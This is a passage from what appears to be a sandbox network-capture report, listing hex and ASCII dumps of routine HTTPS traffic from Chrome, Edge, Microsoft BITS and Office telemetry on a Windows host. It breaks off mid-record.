2024-11-11 09:33:10 UTC	1378	IN	Data Raw: 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 72 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78 74 28 29 3b 69 66 28 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 21 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 63 29 Data Ascii: ype.entries\|\|typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ra([c]));if(!d.has(c)\|\|d.size!=1\|\|d.add(c)!=d\|\|d.size!=1\|\|d.add({x:4})!=d\|\|d.size!=2)return!1;var e=d.entries(),f=e.next();if(f.done\|\|f.value[0]!=c\|\|f.value[1]!=c)
2024-11-11 09:33:10 UTC	1378	IN	Data Raw: 62 2b 39 32 31 36 7d 7d 7d 29 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 22 22 2c 64 3d 30 3b 64 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 76 61 72 20 65 3d 4e 75 6d 62 65 72 28 61 72 67 75 6d 65 6e 74 73 5b 64 5d 29 3b 69 66 28 65 3c 30 7c 7c 65 3e 31 31 31 34 31 31 31 7c 7c 65 21 3d 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 5f 63 6f 64 65 5f 70 6f 69 6e 74 20 22 2b 65 29 3b 65 3c 3d 36 35 35 33 35 3f 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 Data Ascii: b+9216}}});na("String.fromCodePoint",function(a){return a?a:function(b){for(var c="",d=0;d<arguments.length;d++){var e=Number(arguments[d]);if(e<0\|\|e>1114111\|\|e!==Math.floor(e))throw new RangeError("invalid_code_point "+e);e<=65535?c+=String.fromCharCode

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49722	142.250.185.174	443	7060	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:10 UTC	726	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 921 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: / Origin: chrome-untrusted://new-tab-page X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-11 09:33:10 UTC	921	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 31 33 31 37 35 38 38 34 30 33 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1731317588403",null,null,null,
2024-11-11 09:33:11 UTC	942	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: chrome-untrusted://new-tab-page Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=519=hqRw9vV0dqGoNuvlwGp2HHGFL7klV63vEJFreSNI7lpyERh4IKyl_3VKJN3Vs9PTBHV60p37LEvqZ4CYWCvd_pCnVwAzV-tfD_ciPDn3fVaBJJrpCOPYfdU8Uy3E0GKwAsHW0yQeenbK7LD3oCkQcTjylBFI71vnhgid0VoM8JxGaGmkSOwW5GFq; expires=Tue, 13-May-2025 09:33:11 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Mon, 11 Nov 2024 09:33:11 GMT Server: Playlog Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Mon, 11 Nov 2024 09:33:11 GMT Connection: close Transfer-Encoding: chunked
2024-11-11 09:33:11 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-11-11 09:33:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49725	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:12 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-11 09:33:12 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF67) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=25926 Date: Mon, 11 Nov 2024 09:33:12 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49730	142.250.185.174	443	7060	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:12 UTC	928	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 926 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: / Origin: chrome-untrusted://new-tab-page X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=519=hqRw9vV0dqGoNuvlwGp2HHGFL7klV63vEJFreSNI7lpyERh4IKyl_3VKJN3Vs9PTBHV60p37LEvqZ4CYWCvd_pCnVwAzV-tfD_ciPDn3fVaBJJrpCOPYfdU8Uy3E0GKwAsHW0yQeenbK7LD3oCkQcTjylBFI71vnhgid0VoM8JxGaGmkSOwW5GFq
2024-11-11 09:33:12 UTC	926	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 31 33 31 37 35 39 30 31 33 34 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1731317590134",null,null,null,
2024-11-11 09:33:13 UTC	950	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: chrome-untrusted://new-tab-page Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=519=MZ0Wssjvs4nkLio82G2UkeDAPTgiFYSPdByRcbJ-I3U2FuuMx7KaXiJogg4jbPLB_-2BOeUYknsTiBMl_c3o9JuEbWFvjY1GBsRfbSD_TSu2zyTcUcjIH0PT1VsDGmQihmsFMLgdecNyQDl6yzzgRl9d8uqwqAJkDC24ECbblDy5kIFPGh-OoQRU-1PxwOT9; expires=Tue, 13-May-2025 09:33:12 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Mon, 11 Nov 2024 09:33:12 GMT Server: Playlog Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Mon, 11 Nov 2024 09:33:12 GMT Connection: close Transfer-Encoding: chunked
2024-11-11 09:33:13 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-11-11 09:33:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49731	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:12 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-11 09:33:13 UTC	514	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=25949 Date: Mon, 11 Nov 2024 09:33:13 GMT Content-Length: 55 Connection: close X-CID: 2
2024-11-11 09:33:13 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49738	94.245.104.56	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:19 UTC	428	OUT	GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1 Host: api.edgeoffer.microsoft.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:19 UTC	584	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Content-Type: application/x-protobuf; charset=utf-8 Date: Mon, 11 Nov 2024 09:33:18 GMT Server: Microsoft-IIS/10.0 Set-Cookie: ARRAffinity=b65d9106bc81838a23d8a3edd144c8dcf94d11cfa7af5eb97996169fda12e5cf;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com Set-Cookie: ARRAffinitySameSite=b65d9106bc81838a23d8a3edd144c8dcf94d11cfa7af5eb97996169fda12e5cf;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9 X-Powered-By: ASP.NET

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.5	49745	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:20 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:20 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:20 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Sat, 09 Nov 2024 18:56:51 GMT ETag: "0x8DD00F04568BDCF" x-ms-request-id: a2ad2bd1-f01e-0096-27d5-3310ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093320Z-174f7845968vwdr7hC1EWRsh3w00000004pg000000005cw9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:20 UTC	15913	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-11-11 09:33:20 UTC	16384	IN	Data Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
2024-11-11 09:33:20 UTC	16384	IN	Data Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-11-11 09:33:20 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-11-11 09:33:20 UTC	16384	IN	Data Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20 Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
2024-11-11 09:33:20 UTC	16384	IN	Data Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
2024-11-11 09:33:20 UTC	16384	IN	Data Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
2024-11-11 09:33:20 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 Data Ascii: </S> <C T="U32" I="0" O="false" 